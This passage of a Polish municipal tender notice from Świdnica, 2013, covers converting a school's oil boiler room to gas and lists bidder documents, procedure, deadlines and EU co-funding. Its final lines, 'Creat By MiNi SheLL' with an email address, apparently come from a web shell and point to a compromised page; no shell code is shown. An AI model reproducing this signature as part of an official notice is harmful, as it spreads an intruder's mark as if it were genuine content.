</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>wykonał z należytą starannością,   co najmniej dwa zamówienia polegające na budowie lub modernizacji kotłowni gazowej z czego co najmniej jedno z zamówień o wartości nie mniejszej niż 100.000,00 zł netto (przez określenie wartości robót zamówienia należy rozumieć łączną wartość robót tylko dla branży instalacji wewnętrznej gazowej obejmującej roboty technologiczne i instalacyjne w zakresie określonym jak powyżej).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów (art. 369 kc);</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.  Dodatkowo Wykonawca winien do oferty dołączyć:
-zaparafowany projekt umowy - załącznik nr 13 do oferty Wykonawcy,
-dowód wniesienia wadium - załącznik nr 14 do oferty Wykonawcy,
-pełnomocnictwo do podpisania oferty  w przypadku, gdy ofertę podpisuje osoba (osoby nie wskazane                   w dokumencie rejestrowym) upoważniona do składania oświadczeń woli przez Wykonawcę  - załącznik nr  15 do oferty Wykonawcy,
-pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej - załącznik nr 16 do oferty Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego                na takich warunkach jak umowa, której projekt stanowi załącznik B do SIWZ (załącznik nr 13 do oferty Wykonawcy).
2.	Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a.	jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),
b.	jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
3.	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
-	zawieszenia robót przez Zamawiającego;
-	wystąpienia siły wyższej, przy czym za siłę wyższą uznaje się zdarzenie nagłe, nadzwyczajne, zewnętrzne i niemożliwe do przewidzenia, którego nie udało się uniknąć nawet w wypadku najwyższej staranności stron;
-	zmian zakresu robót, w związku ze zmianą technologii dokonanych na wniosek Zamawiającego;;
4.	Zamawiający może dokonać zmiany wynagrodzenia Wykonawcy w przypadku wystąpienia robót nieprzewidzianych w specyfikacji technicznej wykonania i odbioru robót i projekcie, których realizacja warunkuje prawidłowe wykonanie przedmiotu umowy. Podstawę zmiany wynagrodzenia będzie stanowić kalkulacja Wykonawcy pozytywnie zweryfikowana przez Inspektora nadzoru i Zamawiającego.
5.	Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji Zamawiającego.
6.	Zamawiający dopuszcza udzielenie zamówień uzupełniających, o którym mowa w Art. 67  ust. 1 pkt. 6 i 7 ustawy z dnia 29.01.2004 r. Prawo Zamówień Publicznych (tekst jednolity Dz.U. z 2010r.    Nr 113, poz. 759), stanowiących nie więcej niż 10% wartości zamówienia podstawowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, Pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2013 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, Pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe zamówienie obejmuje zakres robót budowlanych: Przebudowa kotłowni olejowej na kotłownie gazową w Szkole Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy będących częścią projektu pn.: Przebudowa Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy - modernizacja obiektów dydaktycznych na terenie powojskowym - etap I, który został złożony przez Inwestora - tj. Gminę Miasto Świdnica do Urzędu Marszałkowskiego Województwa Dolnośląskiego w celu pozyskanie dofinansowania                             ze środków pomocowych na realizację inwestycji w ramach RPO dla Województwa Dolnośląskiego Działanie nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców w Priorytecie nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta).
W sytuacji rażącego zaniedbania Wykonawcy mogącego skutkować np. utratą dofinansowania                           ze środków UE w ramach RPO dla Województwa Dolnośląskiego Zamawiający ma prawo odstąpić od umowy oraz żądać od Wykonawcy stosownego odszkodowania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com